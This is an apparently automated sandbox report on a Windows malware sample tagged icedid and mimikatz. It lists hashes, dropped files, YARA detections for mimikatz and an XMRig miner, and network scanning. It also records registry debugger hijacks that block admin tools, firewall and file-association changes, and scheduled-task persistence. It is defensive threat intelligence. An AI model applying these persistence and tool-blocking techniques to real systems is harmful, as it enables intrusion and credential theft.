Analysis
max time kernel: 153s
max time network: 158s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted: 10-04-2024 18:46

Behavioral task: behavioral1
Sample: 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
Resource: win7-20240221-en

General
Target: 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
Size: 7.0MB
MD5: a9114bc30a0279a8562dd775a2a34f35
SHA1: 4982ef4de4498de9680c0e4dfbd6538fb5afdd04
SHA256: 19078f872d5005e9dd49212541f8e2270630dbe99b0d32152e5e8ed8c2a042c2
SHA512: 80272706690d45886cbda7447b12f440a1ad9cad5d13f1b109eff142d704f7404600f04184cccc59f7dcd8c4a0f7640a1c27bdb82f3afa93f044ab98a9cf5e1c
SSDEEP: 196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 4432 created 1784 | 4432 | puelpci.exe | spoolsv.exe
Contacts a large (19021) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3964-136-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
UPX dump on OEP (original entry point) 38 IoCs
XMRig Miner payload 11 IoCs
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2148-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
C:\Windows\ibimzzri\puelpci.exe | mimikatz
behavioral2/memory/768-7-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/3964-136-0x00007FF699F50000-0x00007FF69A03E000-memory.dmp | mimikatz
Drops file in Drivers directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | puelpci.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | puelpci.exe
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
pid | process
4356 | netsh.exe
1732 | netsh.exe
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | puelpci.exe
Executes dropped EXE 28 IoCs
Processes:
pid | process
768 | puelpci.exe
4432 | puelpci.exe
3344 | wpcap.exe
2948 | nfzqetiti.exe
3964 | vfshost.exe
5004 | tvfbneign.exe
1820 | dlbkbn.exe
2884 | tvfbneign.exe
2088 | xohudmc.exe
1748 | pujbqc.exe
4256 | tvfbneign.exe
2376 | tvfbneign.exe
1960 | tvfbneign.exe
1420 | tvfbneign.exe
4984 | tvfbneign.exe
4460 | puelpci.exe
1112 | tvfbneign.exe
224 | tvfbneign.exe
4376 | tvfbneign.exe
3132 | tvfbneign.exe
2200 | tvfbneign.exe
4564 | tvfbneign.exe
4816 | tvfbneign.exe
4660 | tvfbneign.exe
3128 | tvfbneign.exe
4252 | tvfbneign.exe
2328 | blitiliem.exe
464 | puelpci.exe
Loads dropped DLL 12 IoCs
Processes:
pid | process
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
3344 | wpcap.exe
2948 | nfzqetiti.exe
2948 | nfzqetiti.exe
2948 | nfzqetiti.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
74 | ifconfig.me
75 | ifconfig.me
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A | puelpci.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\pujbqc.exe | xohudmc.exe
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A | puelpci.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File created | C:\Windows\SysWOW64\pujbqc.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | puelpci.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | puelpci.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
Drops file in Program Files directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
Drops file in Windows directory 60 IoCs
Processes:
description | ioc | process
File created | C:\Windows\btlbpeceu\UnattendGC\AppCapture64.dll | puelpci.exe
File created | C:\Windows\ibimzzri\spoolsrv.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\crli-0.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\libeay32.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\posh-0.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\vimpcsvc.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\Packet.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\spoolsrv.exe | puelpci.exe
File opened for modification | C:\Windows\btlbpeceu\Corporate\log.txt | cmd.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\trch-1.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\vimpcsvc.exe | puelpci.exe
File created | C:\Windows\ime\puelpci.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\scan.bat | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\trfo-2.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\schoedcl.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\docmicfg.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\Corporate\vfshost.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\cnli-1.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\spoolsrv.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\docmicfg.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\wpcap.dll | puelpci.exe
File opened for modification | C:\Windows\ibimzzri\schoedcl.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\upbdrjv\swrpwe.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\ip.txt | puelpci.exe
File opened for modification | C:\Windows\btlbpeceu\hnkiaiely\Packet.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\docmicfg.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\svschost.xml | puelpci.exe
File created | C:\Windows\ibimzzri\svschost.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\tucl-1.dll | puelpci.exe
File opened for modification | C:\Windows\ibimzzri\docmicfg.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\svschost.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\vimpcsvc.xml | puelpci.exe
File opened for modification | C:\Windows\ibimzzri\vimpcsvc.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\tibe-2.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\schoedcl.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\spoolsrv.xml | puelpci.exe
File created | C:\Windows\ibimzzri\schoedcl.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\zlib1.dll | puelpci.exe
File created | C:\Windows\ibimzzri\vimpcsvc.xml | puelpci.exe
File created | C:\Windows\ibimzzri\docmicfg.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\coli-0.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\ucl.dll | puelpci.exe
File opened for modification | C:\Windows\btlbpeceu\hnkiaiely\Result.txt | blitiliem.exe
File created | C:\Windows\btlbpeceu\UnattendGC\AppCapture32.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\Corporate\mimilib.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\libxml2.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\svschost.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\schoedcl.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\Shellcode.ini | puelpci.exe
File opened for modification | C:\Windows\ibimzzri\svschost.xml | puelpci.exe
File created | C:\Windows\btlbpeceu\Corporate\mimidrv.sys | puelpci.exe
File created | C:\Windows\ibimzzri\puelpci.exe | 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
File opened for modification | C:\Windows\ibimzzri\puelpci.exe | 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\exma-1.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\hnkiaiely\blitiliem.exe | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\ssleay32.dll | puelpci.exe
File created | C:\Windows\btlbpeceu\UnattendGC\specials\xdvl-0.dll | puelpci.exe
File opened for modification | C:\Windows\ibimzzri\spoolsrv.xml | puelpci.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
3788 | sc.exe
3400 | sc.exe
4536 | sc.exe
3156 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource | yara_rule
C:\Windows\ibimzzri\puelpci.exe | nsis_installer_2
C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe | nsis_installer_1
C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe | nsis_installer_2
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2324 | schtasks.exe
4872 | schtasks.exe
1912 | schtasks.exe
Modifies data under HKEY_USERS 43 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | puelpci.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | puelpci.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | puelpci.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | puelpci.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | puelpci.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | tvfbneign.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | tvfbneign.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | puelpci.exe
Modifies registry class 14 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | puelpci.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | puelpci.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | puelpci.exe
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
4432 | puelpci.exe (this row is repeated 64 times in the report, one per IoC)
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid | process
680 | (no process name recorded; this row is repeated 15 times in the report, one per IoC)
Suspicious behavior: RenamesItself 1 IoCs
Processes:
pid | process
2148 | 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2148 | 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 768 | puelpci.exe
Token: SeDebugPrivilege | 4432 | puelpci.exe
Token: SeDebugPrivilege | 3964 | vfshost.exe
Token: SeDebugPrivilege | 5004 | tvfbneign.exe
Token: SeLockMemoryPrivilege | 1820 | dlbkbn.exe
Token: SeLockMemoryPrivilege | 1820 | dlbkbn.exe
Token: SeDebugPrivilege | 2884 | tvfbneign.exe
Token: SeDebugPrivilege | 4256 | tvfbneign.exe
Token: SeDebugPrivilege | 2376 | tvfbneign.exe
Token: SeDebugPrivilege | 1960 | tvfbneign.exe
Token: SeDebugPrivilege | 1420 | tvfbneign.exe
Token: SeDebugPrivilege | 4984 | tvfbneign.exe
Token: SeDebugPrivilege | 1112 | tvfbneign.exe
Token: SeDebugPrivilege | 224 | tvfbneign.exe
Token: SeDebugPrivilege | 4376 | tvfbneign.exe
Token: SeDebugPrivilege | 3132 | tvfbneign.exe
Token: SeDebugPrivilege | 2200 | tvfbneign.exe
Token: SeDebugPrivilege | 4564 | tvfbneign.exe
Token: SeDebugPrivilege | 4816 | tvfbneign.exe
Token: SeDebugPrivilege | 4660 | tvfbneign.exe
Token: SeDebugPrivilege | 3128 | tvfbneign.exe
Token: SeDebugPrivilege | 4252 | tvfbneign.exe
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
pid process
2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
2148 2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe
768 puelpci.exe
768 puelpci.exe
4432 puelpci.exe
4432 puelpci.exe
2088 xohudmc.exe
1748 pujbqc.exe
4460 puelpci.exe
4460 puelpci.exe
464 puelpci.exe
464 puelpci.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process (identical entries collapsed; the count follows each line)
PID 2148 (2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe) wrote to memory of 2696 (cmd.exe), x3
PID 2696 (cmd.exe) wrote to memory of 688 (PING.EXE), x3
PID 2696 (cmd.exe) wrote to memory of 768 (puelpci.exe), x3
PID 4432 (puelpci.exe) wrote to memory of 1860 (cmd.exe), x3
PID 1860 (cmd.exe) wrote to memory of 4356 (cmd.exe), x3
PID 1860 (cmd.exe) wrote to memory of 4248 (cacls.exe), x3
PID 1860 (cmd.exe) wrote to memory of 4740 (cmd.exe), x3
PID 1860 (cmd.exe) wrote to memory of 3288 (cacls.exe), x3
PID 1860 (cmd.exe) wrote to memory of 1536 (cmd.exe), x3
PID 1860 (cmd.exe) wrote to memory of 4236 (cacls.exe), x3
PID 4432 (puelpci.exe) wrote to memory of 3812 (netsh.exe), x3
PID 4432 (puelpci.exe) wrote to memory of 4736 (netsh.exe), x3
PID 4432 (puelpci.exe) wrote to memory of 3596 (netsh.exe), x3
PID 4432 (puelpci.exe) wrote to memory of 4068 (cmd.exe), x3
PID 4068 (cmd.exe) wrote to memory of 3344 (wpcap.exe), x3
PID 3344 (wpcap.exe) wrote to memory of 2628 (net.exe), x3
PID 2628 (net.exe) wrote to memory of 2224 (net1.exe), x3
PID 3344 (wpcap.exe) wrote to memory of 3744 (net.exe), x3
PID 3744 (net.exe) wrote to memory of 3684 (net1.exe), x3
